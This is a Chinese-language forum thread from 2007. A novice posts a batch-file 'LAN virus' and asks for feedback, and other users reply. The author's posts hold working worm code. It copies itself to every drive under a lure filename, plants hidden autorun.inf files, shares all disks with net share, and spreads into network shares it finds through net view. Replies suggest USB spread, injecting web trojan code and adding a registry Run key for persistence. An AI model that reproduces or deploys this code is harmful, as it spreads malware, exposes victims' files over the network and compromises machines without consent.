|
jshysq
新手上路
积分 10
发帖 4
注册 2007-4-10
状态 离线
|
『楼 主』:
[原创]菜鸟刚编的局域网病毒,请大家指教
@echo off
dir > 365.txt
find "的目录" 365.txt >linshi.txt
for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a
del 365.txt & del linshi.txt
::先根据用户操作打开相应磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k:
::复制本身到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do copy /y icefire.exe %%k:\姻缘测试.exe
::复制诱惑文件到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo [AutoRun]>>%%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open\command=icefire.exe>>%%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo shell\open=打开(^&O)>>%%k:\autorun.inf
::以上三条为写自运行autorun.inf到所有磁盘
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\autorun.inf
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib +s +h +r %%k:\icefire.exe
::隐藏自运行autorun.inf和病毒文件本体
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k:
::共享所有磁盘
::实现本地计算机所有磁盘完全共享
::本程序为自己编写,有一定的危害。本身程序运行有可能会被卡巴所杀。请勿用于不正当用途
::请大家多指教啊
|
|
 2007-4-13 22:05 |
|
|
htysm
高级用户
积分 866
发帖 415
注册 2005-12-4
状态 离线
|
『第
2 楼』:
这个代码执行效率不高。完全可以再精简。
|
|
|
2007-4-13 23:07 |
|
|
jshysq
新手上路
积分 10
发帖 4
注册 2007-4-10
状态 离线
|
『第
3 楼』:
时刻关注中……
发现个问题,就是当用户在直接运行局域网其他机器上的程序时,不能把程序自身复制到用户本身磁盘。真郁闷,不知道怎么实现在其他机器直接运行能复制到本地磁盘。请教高手啊%……
|
|
|
2007-4-13 23:17 |
|
|
fanglor
初级用户
积分 68
发帖 30
注册 2007-1-16
状态 离线
|
『第
4 楼』:
只实现了自我复制和触发机制,并没有向其它机子传播啊?
我也曾构思过,也是AUTORUN.INF.不过我是用U盘作为载体. 这样只要是用过我U盘
的人.都在可能中哦.前提是要开了自动运行哈!
|
|
|
2007-4-14 05:02 |
|
|
benteng302
初级用户
积分 88
发帖 41
注册 2006-3-8
状态 离线
|
|
|
2007-4-15 00:02 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
|
|
2007-4-15 00:12 |
|
|
jshysq
新手上路
积分 10
发帖 4
注册 2007-4-10
状态 离线
|
『第
7 楼』:
修改过的实现局域网扩散。大家帮我看看哦
@echo off
dir > 365.txt
find "的目录" 365.txt >linshi.txt
for /f "skip=2 tokens=1 delims=\ " %%a in (linshi.txt) do explorer %%a
del 365.txt & del linshi.txt
::打开相应目录
for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do net share %%k=%%k:
::开启本地磁盘共享
net view|find "\\" >>netview.txt
for /f "" %%a in (netview.txt) do (
del share.txt
net view %%a|find "Disk" >>share.txt
::取局域网共享目录
for /f "tokens=1" %%i in (share.txt) do (
copy /y icefire.exe %%a\%%i
::复制本身到局域网的共享目录里
copy /y icefire.exe %%a\%%i\缘分测试.exe
::复制为缘分测试.exe
attrib -s -h -r %%a\%%i\autorun.inf
del %%a\%%i\autorun.inf
::删除原有inf文件(主要怕原来有autorun.inf文件导致不能往里写)
echo [AutoRun]>>%%a\%%i\autorun.inf
echo shell\open\command=icefire.exe>>%%a\%%i\autorun.inf
::写自启动文件autorun.inf到局域网共享目录
attrib +s +h +r %%a\%%i\autorun.inf
attrib +s +h +r %%a\%%i\icefire.exe
::隐藏autorun.inf和病毒体本身
)
)
del share.txt && del netview.txt
实现局域网相同工作组共享的感染和移动硬盘的感染
[ Last edited by jshysq on 2007-4-14 at 06:04 PM ]
|
|
|
2007-4-15 00:51 |
|
|
nicesoft
初级用户
积分 98
发帖 47
注册 2007-1-28
状态 离线
|
|
|
2007-4-15 01:55 |
|
|
jackson313
初级用户
积分 48
发帖 26
注册 2007-4-9
状态 离线
|
|
|
2007-4-15 14:38 |
|
|
bza2006
初级用户
积分 58
发帖 27
注册 2007-3-21
状态 离线
|
『第
10 楼』:
免疫过的autorun.inf不是那么简单删除的
写入的autorun.inf语句已经过时了
应该再加上asp,htm挂马代码
还有就是运行后有cmd.exe,很容易被结束进程的
|
玄之又玄
众妙之门
|
|
|
2007-4-16 01:07 |
|
|
bjsh
银牌会员
积分 2000
发帖 621
注册 2007-1-1
状态 离线
|
|
|
2007-4-16 01:19 |
|
|
jshysq
新手上路
积分 10
发帖 4
注册 2007-4-10
状态 离线
|
『第
12 楼』:
呵呵,其实还可以再实现很多功能的。
本来还可以挂个QQ的尾巴的
不过我想这东西不能写的太绝吧~呵呵
[ Last edited by jshysq on 2007-4-18 at 08:58 AM ]
|
|
|
2007-4-18 21:56 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
13 楼』:
楼主不防加个reg文件,在注册表启动项里添加一个值,这样只要对方运行过一次麻烦就大了
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"*.exe"="c\...\*.exe"
[ Last edited by zhoushijay on 2007-4-18 at 05:45 PM ]
|
|
|
2007-4-19 06:33 |
|
|
flyinspace
银牌会员
积分 1206
发帖 517
注册 2007-3-25
状态 离线
|
『第
14 楼』:
用批处理,还不如用vbs写呢。
|
知,不觉多。不知,乃求知 |
|
|
2007-4-19 09:17 |
|
|
